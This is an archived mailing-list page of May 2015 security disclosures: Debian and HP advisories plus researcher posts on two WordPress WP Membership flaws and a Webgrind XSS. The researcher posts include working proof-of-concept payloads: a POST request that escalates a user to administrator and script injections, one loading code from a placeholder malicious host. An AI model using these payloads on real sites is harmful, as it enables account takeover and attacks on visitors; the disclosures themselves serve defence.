Christoph Berg | 22 May 17:18 2015
Picon

[SECURITY] [DSA 3270-1] postgresql-9.4 security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3270-1                   security <at> debian.org
http://www.debian.org/security/                            Christoph Berg
May 22, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : postgresql-9.4
CVE ID         : CVE-2015-3165 CVE-2015-3166 CVE-2015-3167

Several vulnerabilities have been found in PostgreSQL-9.4, a SQL
database system.

CVE-2015-3165 (Remote crash)

    SSL clients disconnecting just before the authentication timeout
    expires can cause the server to crash.

CVE-2015-3166 (Information exposure)

    The replacement implementation of snprintf() failed to check for
    errors reported by the underlying system library calls; the main
    case that might be missed is out-of-memory situations. In the worst
    case this might lead to information exposure.

CVE-2015-3167 (Possible side-channel key exposure)

    In contrib/pgcrypto, some cases of decryption with an incorrect key
    could report other error message texts. Fix by using a
    one-size-fits-all message.
(Continue reading)

Salvatore Bonaccorso | 22 May 07:57 2015
Picon

[SECURITY] [DSA 3268-1] ntfs-3g security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3268-1                   security <at> debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 22, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : ntfs-3g
CVE ID         : CVE-2015-3202
Debian Bug     : 786475

Tavis Ormandy discovered that NTFS-3G, a read-write NTFS driver for
FUSE, does not scrub the environment before executing mount or umount
with elevated privileges. A local user can take advantage of this flaw
to overwrite arbitrary files and gain elevated privileges by accessing
debugging features via the environment that would not normally be safe
for unprivileged users.

For the oldstable distribution (wheezy), this problem has been fixed in
version 1:2012.1.15AR.5-2.1+deb7u1. Note that this issue does not affect
the binary packages distributed in Debian in wheezy as ntfs-3g does not
use the embedded fuse-lite library.

For the stable distribution (jessie), this problem has been fixed in
version 1:2014.2.15AR.2-1+deb8u1.

For the testing distribution (stretch) and the unstable distribution
(sid), this problem will be fixed soon.

We recommend that you upgrade your ntfs-3g packages.
(Continue reading)

Michael Gilbert | 22 May 07:02 2015
Picon

[SECURITY] [DSA 3267-1] chromium-browser security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3267-1                   security <at> debian.org
http://www.debian.org/security/                           Michael Gilbert
May 22, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : chromium-browser
CVE ID         : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254
                 CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258
                 CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262
                 CVE-2015-1263 CVE-2015-1264 CVE-2015-1265

Several vulnerabilities were discovered in the chromium web browser.

CVE-2015-1251

    SkyLined discovered a use-after-free issue in speech recognition.

CVE-2015-1252

    An out-of-bounds write issue was discovered that could be used to
    escape from the sandbox.

CVE-2015-1253

    A cross-origin bypass issue was discovered in the DOM parser.

CVE-2015-1254

(Continue reading)

security-alert | 21 May 22:48 2015
Picon

[security bulletin] HPSBMU03336 rev.1- HP Helion OpenStack affected by VENOM, Denial of Service (DoS), Execution of Arbitrary Code


UPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04685037
Version: 1

HPSBMU03336 rev.1- HP Helion OpenStack affected by VENOM, Denial of Service
(DoS),

Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-21
Last Updated: 2015-05-21

Potential Security Impact: Denial of Service (DoS), Execution of Arbitary
Code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has identitfied with HP Helion OpenStack.
The

vulnerability could be exploited resulting in Denial of Service (DoS) or
execution of

arbitrary code.
(Continue reading)

pan.vagenas | 21 May 22:39 2015
Picon

CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]

# Exploit Title: WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038

1 Description

Any registered user can perform a privilege escalation through `iv_membership_update_user_settings`
AJAX action. 
Although this exploit can be used to modify other plugin related data (eg payment status and expiry date),
privilege escalation can lead to a serious incident because the malicious user can take administrative
role to the infected website.

2 Proof of Concept

* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`

3 Actions taken after discovery

Vendor was informed on 2015/05/19.

4 Solution

No official solution yet exists.

(Continue reading)

pan.vagenas | 21 May 22:36 2015
Picon

CVE-2015-4039 - WordPress WP Membership plugin [Stored XSS]

# Exploit Title: WordPress WP Membership plugin [Stored XSS]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4039

=============================================
* 1. Stored XSS
=============================================

1.1 Description

All input fields from registered users aren't properly escaped. This could lead to an XSS attack that could
possibly affect all visitors of the website, including administators.

1.2 Proof of Concept

* Login as regular user
* Update any field of your profile appending at the end
	`<script>alert('XSS');</script>` 
	or 
	`<script src=”http://malicious .server/my_malicious_script.js”/>`

1.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

1.4 Solution
(Continue reading)

Salvatore Bonaccorso | 21 May 19:27 2015
Picon

[SECURITY] [DSA 3266-1] fuse security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3266-1                   security <at> debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 21, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : fuse
CVE ID         : CVE-2015-3202

Tavis Ormandy discovered that FUSE, a Filesystem in USErspace, does not
scrub the environment before executing mount or umount with elevated
privileges. A local user can take advantage of this flaw to overwrite
arbitrary files and gain elevated privileges by accessing debugging
features via the environment that would not normally be safe for
unprivileged users.

For the oldstable distribution (wheezy), this problem has been fixed
in version 2.9.0-2+deb7u2.

For the stable distribution (jessie), this problem has been fixed in
version 2.9.3-15+deb8u1.

For the testing distribution (stretch) and the unstable distribution
(sid), this problem will be fixed soon.

We recommend that you upgrade your fuse packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
(Continue reading)

hyp3rlinx | 21 May 19:28 2015
Picon

Webgrind XSS vulnerability

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is a Xdebug Profiling Web Frontend in PHP.

Advisory Information:
=====================================================
Webgrind is vulnerable to cross site scripting attacks.

Exploit code:
==============
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E

Disclosure Timeline:
==================================

Vendor Notification  May 19, 2015
May 20, 2015: Public Disclosure

Severity Level:
===============
Med

(Continue reading)

Salvatore Bonaccorso | 20 May 22:25 2015
Picon

[SECURITY] [DSA 3261-2] libmodule-signature-perl regression update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3261-2                   security <at> debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 20, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : libmodule-signature-perl
Debian Bug     : 785701

The update for libmodule-signature-perl issued as DSA-3261-1 introduced
a regression in the handling of the --skip option of cpansign. Updated
packages are now available to address this regression. For reference,
the original advisory text follows.

Multiple vulnerabilities were discovered in libmodule-signature-perl, a
Perl module to manipulate CPAN SIGNATURE files. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2015-3406

    John Lightsey discovered that Module::Signature could parses the
    unsigned portion of the SIGNATURE file as the signed portion due to
    incorrect handling of PGP signature boundaries.

CVE-2015-3407

    John Lightsey discovered that Module::Signature incorrectly handles
    files that are not listed in the SIGNATURE file. This includes some
    files in the t/ directory that would execute when tests are run.
(Continue reading)

security-alert | 20 May 17:11 2015
Picon

[security bulletin] HPSBUX03333 SSRT102029 rev.1 - HP-UX Running NTP, Remote Denial of Service (DoS), or Other Vulnerabilities


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04679309

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04679309
Version: 1

HPSBUX03333 SSRT102029 rev.1 - HP-UX Running NTP, Remote Denial of Service
(DoS), or Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-19
Last Updated: 2015-05-19

Potential Security Impact: Remote Denial of Service (DoS), or other
vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running
NTP. These could be exploited remotely to create a Denial of Service (DoS),
or other vulnerabilities.

References:
(Continue reading)

security-alert | 20 May 17:11 2015
Picon

[security bulletin] HPSBUX03334 SSRT102000 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS) and Other Vulnerabilities


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04679334

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04679334
Version: 1

HPSBUX03334 SSRT102000 rev.1 - HP-UX Running OpenSSL, Remote Denial of
Service (DoS) and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-19
Last Updated: 2015-05-19

Potential Security Impact: Remote Denial of Service (DoS) and other
vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running
OpenSSL. These vulnerabilities could be exploited remotely to create a remote
Denial of Service (DoS) and other vulnerabilities.

References:
(Continue reading)


Gmane